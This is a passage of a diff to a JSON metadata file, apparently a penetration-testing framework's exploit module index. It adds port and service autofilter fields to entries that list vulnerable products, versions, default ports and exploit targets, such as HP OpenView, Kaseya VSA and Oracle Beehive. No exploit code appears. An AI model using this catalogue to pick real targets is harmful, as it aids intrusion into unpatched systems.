"platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53", "HP OpenView Network Node Manager 7.53 (Windows 2003)" @@ -81357,6 +105661,21 @@ "platform": "Windows", "arch": "", "rport": 7510, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Windows 2003/zip.dll OpenView 7.53", @@ -81396,6 +105715,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" ], @@ -81429,6 +105763,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50" ], @@ -81463,6 +105812,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81500,6 +105864,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81536,6 +105915,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01206", "Debug Target" @@ -81569,6 +105963,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81604,6 +106013,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81639,6 +106063,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81675,6 +106114,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager Release B.07.00", @@ -81714,6 +106168,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager 7.53 w/NNM_01206", @@ -81754,6 +106223,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager 7.53", @@ -81789,6 +106273,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -81824,6 +106323,21 @@ "platform": "Windows", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP ProCurve Manager 4.0 SNAC Server" ], @@ -81859,6 +106373,21 @@ "platform": "Windows", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP ProCurve Manager 4.0 SNAC Server" ], @@ -81894,6 +106423,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Win Server 2003 SP0" ], @@ -81927,6 +106471,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English" ], @@ -81961,6 +106520,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.30 / Microsoft Windows 7 and higher", "HP SiteScope 11.30 / CMD" @@ -81997,6 +106571,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" ], @@ -82033,6 +106622,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "httpdx 1.4 - Windows XP SP3 English", "httpdx 1.4 - Windows 2003 SP2 English" @@ -82066,6 +106670,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "httpdx 1.4 - Windows XP SP3 English", @@ -82106,6 +106725,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IA WebMail 3.x" ], @@ -82142,6 +106776,21 @@ "platform": "Windows", "arch": "", "rport": 9495, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows Server 2003 SP0", @@ -82179,6 +106828,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "TPMfOSD 5.1 (Windows 2000 SP4 - English)", "TPMfOSD 5.1 (Windows 2003 All - English)" @@ -82213,6 +106877,12 @@ "platform": "Windows", "arch": "", "rport": 1581, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.3" ], @@ -82248,6 +106918,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -82284,6 +106960,21 @@ "platform": "Windows", "arch": "", "rport": 18881, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Integard Home 2.0.0.9021", @@ -82318,6 +107009,21 @@ "platform": "Windows", "arch": "", "rport": 57772, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English" ], @@ -82352,6 +107058,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "v1.0 - XP / Win7" ], @@ -82385,6 +107097,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WhatsUP Gold 8.03 Universal" ], @@ -82421,6 +107148,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Jira 6.0.3 / Windows 2003 SP2" ], @@ -82455,6 +107197,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kaseya VSA v7 to v9.1" ], @@ -82489,6 +107246,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kaseya KServer / Windows" ], @@ -82525,6 +107297,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP sp3", "Windows Server 2003 sp2" @@ -82564,6 +107351,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" ], @@ -82598,6 +107400,21 @@ "platform": "Windows", "arch": "java", "rport": 9788, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Lexmark Markvision Enterprise 2.0" ], @@ -82633,6 +107450,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MEHTTPS.exe Universal" ], @@ -82668,6 +107500,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine OpManager <= v11.6" ], @@ -82699,6 +107546,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82733,6 +107595,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82764,6 +107641,21 @@ "platform": "Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82796,6 +107688,21 @@ "platform": "Windows", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine Desktop Central 9 on Windows" ], @@ -82829,6 +107736,12 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MaxDB 7.6.00.16", "MaxDB 7.6.00.27" @@ -82864,6 +107777,21 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MaxDB 7.5.00.11 / 7.5.00.24", "Windows 2000 English", @@ -82905,6 +107833,12 @@ "platform": "Windows", "arch": "x86", "rport": 81, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "ePo 2.5.1 (Service Pack 1)", @@ -82940,6 +107874,12 @@ "platform": "Windows", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal MDaemon.exe", "Debugging test" @@ -82975,6 +107915,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows 2000 SP0-SP3 English", @@ -83021,6 +107976,21 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MiniWeb build 300 on Windows (Before Vista)" ], @@ -83054,6 +108024,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NaviCOPA 2.0.1 Universal" ], @@ -83089,6 +108065,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NetDecision 4.5.1 on XP SP3" ], @@ -83123,6 +108114,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR ProSafe Network Management System 300 / Windows" ], @@ -83156,6 +108162,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -83191,6 +108212,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Novell Zenworks Mobile Device Management on Windows" ], @@ -83224,6 +108260,12 @@ "platform": "Windows", "arch": "", "rport": 8300, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Groupwise Messenger DClient.dll v10510.37" ], @@ -83257,6 +108299,21 @@ "platform": "Windows", "arch": "", "rport": 8800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Now SMS/MMS Gateway v2007.06.27" ], @@ -83288,6 +108345,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Powershell" ], @@ -83322,6 +108394,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -83357,6 +108435,21 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Beehive 2" ], @@ -83390,6 +108483,21 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Beehive 2" ], @@ -83425,6 +108533,21 @@ "platform": "Java,Windows", "arch": "", "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" @@ -83462,6 +108585,21 @@ "platform": "Windows", "arch": "x64, x86", "rport": 7770, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" ], @@ -83497,6 +108635,21 @@ "platform": "Windows", "arch": "x86", "rport": 9002, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" ], @@ -83530,6 +108683,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -83563,6 +108731,12 @@ "platform": "Windows", "arch": "", "rport": 7144, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English SP0-SP4", @@ -83604,6 +108778,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" ], @@ -83637,6 +108826,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 English SP0", "Windows 2000 English SP1", @@ -83677,6 +108881,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro SP0-4 English", @@ -83716,6 +108926,21 @@ "platform": "Windows", "arch": "", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "R4 v1.25" ], @@ -83751,6 +108976,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -83786,6 +109026,12 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000", @@ -83822,6 +109068,21 @@ "platform": "Windows", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows generic" ], @@ -83856,6 +109117,21 @@ "platform": "Windows", "arch": "", "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" ], @@ -83889,6 +109165,21 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SAP DB 7.4 WebTools" ], @@ -83923,6 +109214,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Savant.exe", "Windows 2000 Pro All - English", @@ -83962,6 +109268,21 @@ "platform": "Windows", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -83997,6 +109318,21 @@ "platform": "Windows", "arch": "", "rport": 23423, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -84032,6 +109368,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP2 English (NX)", "Windows 2000 SP4 and XP SP3 English (SEH)" @@ -84067,6 +109409,21 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows NT SP5/SP6a English", @@ -84107,6 +109464,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT English SP5-SP6", @@ -84153,6 +109516,21 @@ "platform": "Windows", "arch": "", "rport": 48080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Solarwinds Firewall Security Manager 6.6.5" ], @@ -84189,6 +109567,21 @@ "platform": "Windows", "arch": "", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -84226,6 +109619,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dell SonicWall Scrutinizer 9.5.1 or older" ], @@ -84261,6 +109669,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -84296,6 +109710,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" ], @@ -84329,6 +109758,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", @@ -84367,6 +109811,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Sync Breeze Enterprise v9.4.28", @@ -84407,6 +109866,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Sysax Multi Server 5.64", "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" @@ -84443,6 +109917,21 @@ "platform": "Windows", "arch": "", "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 English", "Windows XP English SP0/SP1", @@ -84479,6 +109968,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Numara / BMC Track-It! v9 to v11.X - Windows" ], @@ -84511,6 +110015,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" ], @@ -84545,6 +110064,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "OfficeScan 11", @@ -84583,6 +110117,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "v1.21 - Windows Server 2000", "v1.21 - Windows XP SP0", @@ -84621,6 +110170,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" ], @@ -84656,6 +110220,21 @@ "platform": "Windows", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" ], @@ -84687,6 +110266,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "VX Search Enterprise v9.5.12" ], @@ -84722,6 +110316,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP0", "Debug" @@ -84754,6 +110363,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -84789,6 +110413,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xigui32.exe Universal", "xitami.exe Universal" @@ -84826,6 +110456,21 @@ "platform": "Java", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal" ], @@ -84862,6 +110507,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows x86", @@ -84904,6 +110564,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Microsoft Windows Server 2003 R2 SP2 x86" ], @@ -84939,6 +110614,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -84974,6 +110664,12 @@ "platform": 